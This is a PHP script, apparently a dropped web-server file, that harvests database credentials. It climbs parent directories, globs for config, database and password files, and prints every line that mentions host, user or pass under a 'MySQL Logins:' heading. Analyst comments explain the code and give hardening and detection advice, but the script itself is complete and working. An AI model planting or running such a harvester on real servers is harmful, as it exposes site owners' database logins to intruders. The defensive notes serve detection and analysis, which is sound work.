<?php
// Analyst summary: this is a credential-harvesting script meant to be run by a
// web server's PHP interpreter. It steps up from the current directory,
// globs downwards for configuration-like file names, and prints every
// variable/define() line that mentions "host", "user" or "pass".
//
// Defensive notes (general hardening, not derived from this file):
//  - keep database configuration outside the document root and readable only
//    by the account that needs it; the script only sees what PHP can read;
//  - open_basedir limits how far chdir()/glob()/file() can reach from a vhost;
//  - the literal heading "MySQL Logins:" and the glob pattern list below are
//    usable content signatures when scanning web roots for dropped files;
//  - if this file is found on a host, treat every credential in a matching
//    config file as exposed and rotate it.

$backwards_depth = 2; // number of parent directories to climb before searching
$forward_depth = 4; // number of directory levels to glob below that point

// Script entry: climb first, then search and print from wherever we ended up.
backstep($backwards_depth);
getMysql($forward_depth);

// Moves the working directory up by at most $amount levels.
// Stops early and returns the number of levels climbed when ".." is not
// readable; returns nothing when every step succeeds. The caller above
// ignores the return value.
function backstep($amount)
{
    for($i = 0; $i < $amount; $i++)
    {
        // '@' suppresses any warning from the readability probe
        if(@is_readable(".."))
            chdir("..");
        else
            return $i;
    }
}

// Prints, as HTML, candidate database connection settings found in readable
// configuration-like files up to $depth directory levels below the current
// working directory. Output is echoed directly; nothing is returned.
function getMysql($depth)
{
    echo "<h3>MySQL Logins:</h3>";
    // The third and fourth arguments are '|'-separated lists: glob patterns to
    // search for, and substrings that disqualify a path (they are not regular
    // expressions).
    $files = findFile($depth, getcwd(), "*config*|*.conf|*database*|*passwd*|*password*", ".gif|.jpg|.png|.htm|.js|template|forgot|remind|new|change|lib|sample|install", "read");
    foreach($files as $path)
    {
        $dbinfo = false;
        $contents = file($path);
        foreach($contents as $line)
        {
            $line = trim($line);
            // Only lines that start with '$' or contain "define(" are kept.
            if($line[0] != '$' && strpos(strtolower($line), "define(") === false)
                continue;
            // Cut the line at the first comment marker found; only one of the
            // three markers is applied per line.
            if(strpos($line, "//") !== false)
                $line = substr($line, 0, strpos($line, "//"));
            else if(strpos($line, "/*") !== false)
                $line = substr($line, 0, strpos($line, "/*"));
            else if(strpos($line, "#") !== false)
                $line = substr($line, 0, strpos($line, "#"));
            // Collect the line if it mentions host, user or pass (case-insensitive).
            if(strpos(strtolower($line), "host") !== false)
                $dbinfo .= $line.'<br>';
            else if(strpos(strtolower($line), "user") !== false)
                $dbinfo .= $line.'<br>';
            else if(strpos(strtolower($line), "pass") !== false)
                $dbinfo .= $line.'<br>';
        }
        // Path and collected lines are echoed without HTML escaping.
        if($dbinfo != false)
            echo "<font color=green>".$path."</font>:<br>".$dbinfo.'<br>';
    }
}

// Globs for files below $find_startfrom and returns their paths.
//   $find_depth     - number of extra directory levels to descend (0 = start dir only)
//   $find_startfrom - directory to search from; the cwd is switched to it
//   $find_query     - '|'-separated glob patterns
//   $find_reject    - '|'-separated substrings that disqualify a path ("" = none)
//   $find_perms     - "read", "write", "execute" or "setuid"
// Returns -1 when $find_query is empty (the original working directory is not
// restored on that path). Otherwise returns $matches, which is only ever
// assigned by appending, so it is unset when nothing matched.
function findFile($find_depth, $find_startfrom, $find_query, $find_reject, $find_perms)
{
    $startdir = getcwd();
    chdir($find_startfrom);
    if($find_query == "")
        return -1;
    else
    {
        $query = explode("|", $find_query);
        $query_len = count($query) - 1;
    }
    if($find_reject == "")
        $reject_len = -1;
    else
    {
        $reject = explode("|", $find_reject);
        $reject_len = count($reject) - 1;
    }
    // Map the permission keyword to a numeric mode; any other value leaves
    // $perms unset.
    if($find_perms == "read")
        $perms = 0;
    else if($find_perms == "write")
        $perms = 1;
    else if($find_perms == "execute")
        $perms = 2;
    else if($find_perms == "setuid")
        $perms = 3;
    $depth_dir = "";
    $matches; // bare expression: this does not initialise the variable
    $match = true;
    $x = 0;
    // Outer loop: one pass per directory level; $depth_dir grows by one
    // wildcard path segment at the end of each pass.
    while($x <= $find_depth)
    {
        $y = 0;
        while($y <= $query_len)
        {
            $search = $depth_dir.$query[$y];
            $files = glob($search);
            // A non-array glob() result abandons the remaining patterns for this level.
            if(!is_array($files))
                break;
            foreach($files as $possible_file)
            {
                if($reject_len != -1)
                {
                    $z = 0;
                    while($z <= $reject_len)
                    {
                        // strpos() is tested for truthiness, so a hit at
                        // offset 0 does not count as a rejection.
                        if(strpos($possible_file, $reject[$z]))
                        {
                            $match = false;
                            break;
                        }
                        $z++;
                    }
                }
                // No braces are used here, so each 'else' binds to the nearest
                // preceding 'if'; the indentation below follows that parse.
                // This script only ever passes "read" ($perms == 0).
                if($perms == 0)
                    if(!is_readable($possible_file))
                        $match = false;
                    else if($perms == 1)
                        if(!is_writeable($possible_file))
                            $match = false;
                        else if($perms == 2)
                            if(!is_executable($possible_file))
                                $match = false;
                            else if($perms == 3)
                            {
                                // NOTE(review): divides the numeric mode by decimal 1000,
                                // which does not look like an octal digit extraction - confirm.
                                $setuid = floor(fileperms($possible_file) / 1000);
                                if(!is_executable($possible_file))
                                    $match = false;
                                if($setuid != 1 && $setuid != 2 && $setuid != 4 && $setuid != 6)
                                    $match = false;
                            }
                if($match == true)
                    $matches[] = $find_startfrom.DIRECTORY_SEPARATOR.$possible_file;
                // Reset the flag for the next candidate.
                $match = true;
            }
            $y++;
        }
        $x++;
        $depth_dir .= '*'.DIRECTORY_SEPARATOR;
    }
    // Restore the caller's working directory before returning.
    chdir($startdir);
    return $matches;
}
?>